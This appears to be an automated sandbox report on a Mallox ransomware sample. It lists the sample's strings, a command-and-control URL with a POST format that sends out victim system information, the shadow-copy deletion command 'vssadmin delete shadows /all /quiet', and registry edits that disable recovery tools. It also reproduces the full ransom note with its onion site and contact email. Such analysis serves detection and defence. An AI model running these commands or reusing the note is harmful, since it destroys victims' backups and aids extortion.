        Source: malware.exe, 00000000.00000003.1698970841.0000000004A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
        Source: malware.exe, 00000000.00000003.1684002879.0000000004A71000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1698970841.0000000004A71000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1679995597.0000000004A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
        Source: malware.exeString found in binary or memory: http://api.ipify.orgx32x64%s
        Source: prcr.x3d.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
        Source: prcr.x3d.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
        Source: prcr.x3d.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
        Source: prcr.x3d.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
        Source: resources.pak0.0.drString found in binary or memory: http://crbug.com/775961
        Source: prcr.x3d.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
        Source: prcr.x3d.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
        Source: prcr.x3d.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
        Source: prcr.x3d.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
        Source: prcr.x3d.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
        Source: index.html.0.drString found in binary or memory: http://css3pie.com
        Source: index.html.0.drString found in binary or memory: http://jquery.com/
        Source: index.html.0.drString found in binary or memory: http://jquery.org/license
        Source: prcr.x3d.0.drString found in binary or memory: http://ocsp.digicert.com0
        Source: prcr.x3d.0.drString found in binary or memory: http://ocsp.digicert.com0A
        Source: prcr.x3d.0.drString found in binary or memory: http://ocsp.digicert.com0C
        Source: prcr.x3d.0.drString found in binary or memory: http://ocsp.digicert.com0X
        Source: index.html.0.drString found in binary or memory: http://sizzlejs.com/
        Source: prcr.x3d.0.drString found in binary or memory: http://www.digicert.com/CPS0
        Source: resources.pak0.0.drString found in binary or memory: https://accounts.google.com/
        Source: resources.pak0.0.drString found in binary or memory: https://webstore.google.com/
        Source: malware.exe, 00000000.00000003.1857834155.0000000004AED000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2321452398.0000000004D56000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2303264795.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1925943676.0000000004AED000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1796881992.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2252053063.0000000004D56000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2375208096.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1794658829.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2191393645.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1922502022.0000000004AED000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2432004957.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1691543282.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1919160838.0000000004AED000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1789533041.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2482024738.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1839868357.0000000004AED000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1788942681.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2189324109.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2369982423.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2500906615.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2185245833.0000000004D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whyers.io/
        Source: malware.exe, 00000000.00000003.1796881992.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1794658829.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1789533041.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1788942681.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1807188084.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1801556961.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1784852079.0000000004D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whyers.io/)
        Source: malware.exe, 00000000.00000003.1691543282.0000000000E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whyers.io/3
        Source: malware.exe, 00000000.00000003.1771865574.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2041675211.0000000004AC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whyers.io/QWEwqdsvsf/ap.php
        Source: malware.exeString found in binary or memory: https://whyers.io/QWEwqdsvsf/ap.phpContent-Type:
        Source: malware.exe, 00000000.00000003.1887164409.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1868651794.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1977014914.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1855694509.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2037221890.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1987432788.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2022464109.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2005801076.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1980943375.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1960503217.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1873661843.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2002388849.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1846105138.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1902261303.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1846576841.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1962199418.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2019688647.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2013453165.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2042488475.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1994372794.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2005382194.0000000004AC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whyers.io/QWEwqdsvsf/ap.phpQWEwqdsvsf/ap.php
        Source: malware.exe, 00000000.00000003.1796881992.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1794658829.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1789533041.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1788942681.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1807188084.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1801556961.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1784852079.0000000004D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whyers.io/QWEwqdsvsf/ap.phpg
        Source: malware.exe, 00000000.00000003.2041675211.0000000004AC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whyers.io/QWEwqdsvsf/ap.phpnd
        Source: malware.exe, 00000000.00000003.1729388605.0000000004D50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whyers.io/QWEwqdsvsf/ap.phps
        Source: malware.exe, 00000000.00000003.2041675211.0000000004AC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whyers.io/QWEwqdsvsf/ap.phpt
        Source: malware.exe, 00000000.00000003.1763717846.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1769660512.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1754054435.0000000004D50000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1756661483.0000000004D50000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1759582601.0000000004D50000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1742531721.0000000004D50000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1762438430.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1747377941.0000000004D50000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1729388605.0000000004D50000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1770992838.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1771865574.0000000004D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whyers.io/QWEwqdsvsf/ap.phpy
        Source: malware.exe, 00000000.00000003.1796881992.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1794658829.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1789533041.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1788942681.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1807188084.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1801556961.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1784852079.0000000004D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whyers.io/s
        Source: malware.exe, FILE RECOVERY.txt421.0.dr, FILE RECOVERY.txt215.0.dr, FILE RECOVERY.txt529.0.dr, FILE RECOVERY.txt102.0.dr, FILE RECOVERY.txt183.0.dr, FILE RECOVERY.txt230.0.dr, FILE RECOVERY.txt348.0.dr, FILE RECOVERY.txt58.0.dr, FILE RECOVERY.txt349.0.dr, FILE RECOVERY.txt573.0.dr, FILE RECOVERY.txt342.0.dr, FILE RECOVERY.txt28.0.dr, FILE RECOVERY.txt446.0.dr, FILE RECOVERY.txt401.0.dr, FILE RECOVERY.txt97.0.dr, FILE RECOVERY.txt285.0.dr, FILE RECOVERY.txt324.0.dr, FILE RECOVERY.txt409.0.dr, FILE RECOVERY.txt571.0.dr, FILE RECOVERY.txt598.0.drString found in binary or memory: https://www.torproject.org/download/
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownHTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:49733 version: TLS 1.2
        Source: malware.exe, 00000000.00000003.2041675211.0000000004AA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _WCE47~1.AU3_WinAPI_RegisterRawInputDevices.au3memstr_9d52b756-1

        Spam, unwanted Advertisements and Ransom Demands

        barindex
        Found ransom note / readme
        Source: C:\FILE RECOVERY.txtDropped file: HelloYour files are encrypted and can not be usedTo return your files in work condition you need decryption toolFollow the instructions to decrypt all your dataDo not try to change or restore files yourself, this will break themIf you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MBHow to get decryption tool:1) Download and install TOR browser by this link: https://www.torproject.org/download/2) If TOR blocked in your country and you can't access to the link then use any VPN software3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E0977868505) You will see payment information and we can make free test decryption hereOur blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionIf you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.orgWaiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. Jump to dropped file
        Yara detected RansomwareGeneric
        Source: Yara matchFile source: Process Memory Space: malware.exe PID: 6904, type: MEMORYSTR
        Yara detected Targeted Ransomware
        Source: Yara matchFile source: Process Memory Space: malware.exe PID: 6904, type: MEMORYSTR
        Yara detected TrojanRansom
        Source: Yara matchFile source: Process Memory Space: malware.exe PID: 6904, type: MEMORYSTR
        Deletes shadow drive data (may be related to ransomware)
        Source: C:\Users\user\Desktop\malware.exeProcess created: C:\Windows\System32\vssadmin.exe "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
        Source: C:\Users\user\Desktop\malware.exeProcess created: C:\Windows\System32\vssadmin.exe "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quietJump to behavior
        Source: malware.exe, 00000000.00000003.1647668209.0000000000DB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
        Source: malware.exe, 00000000.00000000.1642350702.0000000000799000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 0.%d%duser=%s&TargetID=%s&SystemInformation=%s&max_size_of_file=%s&size_of_hdd=%dPOST%s|%s|%s|%d/c ping 127.0.0.1 && del "%s" >> NULSOFTWARE\RaccineSYSTEM\CurrentControlSet\Services\EventLog\Application\RaccineSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe-lr-d-p-path-queueC:\*C:\HOW TO RECOVER !!.TXT\sysnative\vssadmin.exe delete shadows /all /quietopenPowrProf.dllPowerSetActiveSchemeSeTakeOwnershipPrivilegeSeDebugPrivilegeNtQueryObjectntdll.dlluser32.dllShutdownBlockReasonCreatewindowDo NOT shutdown OR reboot your PC: this might damage your files permanently !valueSOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDownSOFTWARE\Microsoft\PolicyManager\default\Start\HideRestartSOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOutshutdownwithoutlogonSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemMaxConnectionTimeSOFTWARE\Policies\Microsoft\Windows NT\Terminal ServicesMaxDisconnectionTimeMaxIdleTimevector<T> too longstring too longmap/set<T> too longNtQuerySystemInformation\
        Source: malware.exe, 00000000.00000003.2185527738.0000000000DB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
        Source: malware.exe, 00000000.00000003.1646737994.0000000000DF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\sysnative\vssadmin.exe"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quietC:\Windows\sysnative\vssadmin.exeWinsta0\Default=::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files (x86)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=x86PROCESSOR_ARCHITEW6432=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows
        Source: vssadmin.exe, 00000002.00000002.1657138850.000001D292755000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\sysnative\vssadmin.exedeleteshadows/all/quieti#]V
        Source: vssadmin.exe, 00000002.00000002.1656976373.000001D292620000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\vssadmin.exe"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quietC:\Windows\sysnative\vssadmin.exeWinsta0\DefaultZ
        Source: vssadmin.exe, 00000002.00000002.1656976373.000001D292620000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
        Source: malware.exeBinary or memory string: 0.%d%duser=%s&TargetID=%s&SystemInformation=%s&max_size_of_file=%s&size_of_hdd=%dPOST%s|%s|%s|%d/c ping 127.0.0.1 && del "%s" >> NULSOFTWARE\RaccineSYSTEM\CurrentControlSet\Services\EventLog\Application\RaccineSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe-lr-d-p-path-queueC:\*C:\HOW TO RECOVER !!.TXT\sysnative\vssadmin.exe delete shadows /all /quietopenPowrProf.dllPowerSetActiveSchemeSeTakeOwnershipPrivilegeSeDebugPrivilegeNtQueryObjectntdll.dlluser32.dllShutdownBlockReasonCreatewindowDo NOT shutdown OR reboot your PC: this might damage your files permanently !valueSOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDownSOFTWARE\Microsoft\PolicyManager\default\Start\HideRestartSOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOutshutdownwithoutlogonSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemMaxConnectionTimeSOFTWARE\Policies\Microsoft\Windows NT\Terminal ServicesMaxDisconnectionTimeMaxIdleTimevector<T> too longstring too longmap/set<T> too longNtQuerySystemInformation\
        May disable shadow drive data (uses vssadmin)
        Source: C:\Users\user\Desktop\malware.exeProcess created: C:\Windows\System32\vssadmin.exe "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
        Source: C:\Users\user\Desktop\malware.exeProcess created: C:\Windows\System32\vssadmin.exe "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quietJump to behavior
        Writes a notice file (html or txt) to demand a ransom
        Source: C:\Users\user\Desktop\malware.exeFile dropped: C:\FILE RECOVERY.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: d867aabcb6cf90e0977868505) you will see payment information and we can make free test decryption hereour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.orgwaiting for a response via mail caJump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile dropped: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1000\FILE RECOVERY.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: d867aabcb6cf90e0977868505) you will see payment information and we can make free test decryption hereour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.orgwaiting for a response via mail caJump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile dropped: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1001\FILE RECOVERY.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: d867aabcb6cf90e0977868505) you will see payment information and we can make free test decryption hereour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.orgwaiting for a response via mail caJump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile dropped: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\FILE RECOVERY.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: d867aabcb6cf90e0977868505) you will see payment information and we can make free test decryption hereour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.orgwaiting for a response via mail caJump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile dropped: C:\$Recycle.Bin\FILE RECOVERY.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: d867aabcb6cf90e0977868505) you will see payment information and we can make free test decryption hereour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.orgwaiting for a response via mail caJump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile dropped: C:\$WinREAgent\FILE RECOVERY.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: d867aabcb6cf90e0977868505) you will see payment information and we can make free test decryption hereour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.orgwaiting for a response via mail caJump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile dropped: C:\Users\Public\Desktop\FILE RECOVERY.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: d867aabcb6cf90e0977868505) you will see payment information and we can make free test decryption hereour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.orgwaiting for a response via mail caJump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile dropped: C:\Users\Public\Music\FILE RECOVERY.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: d867aabcb6cf90e0977868505) you will see payment information and we can make free test decryption hereour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.orgwaiting for a response via mail caJump to dropped file
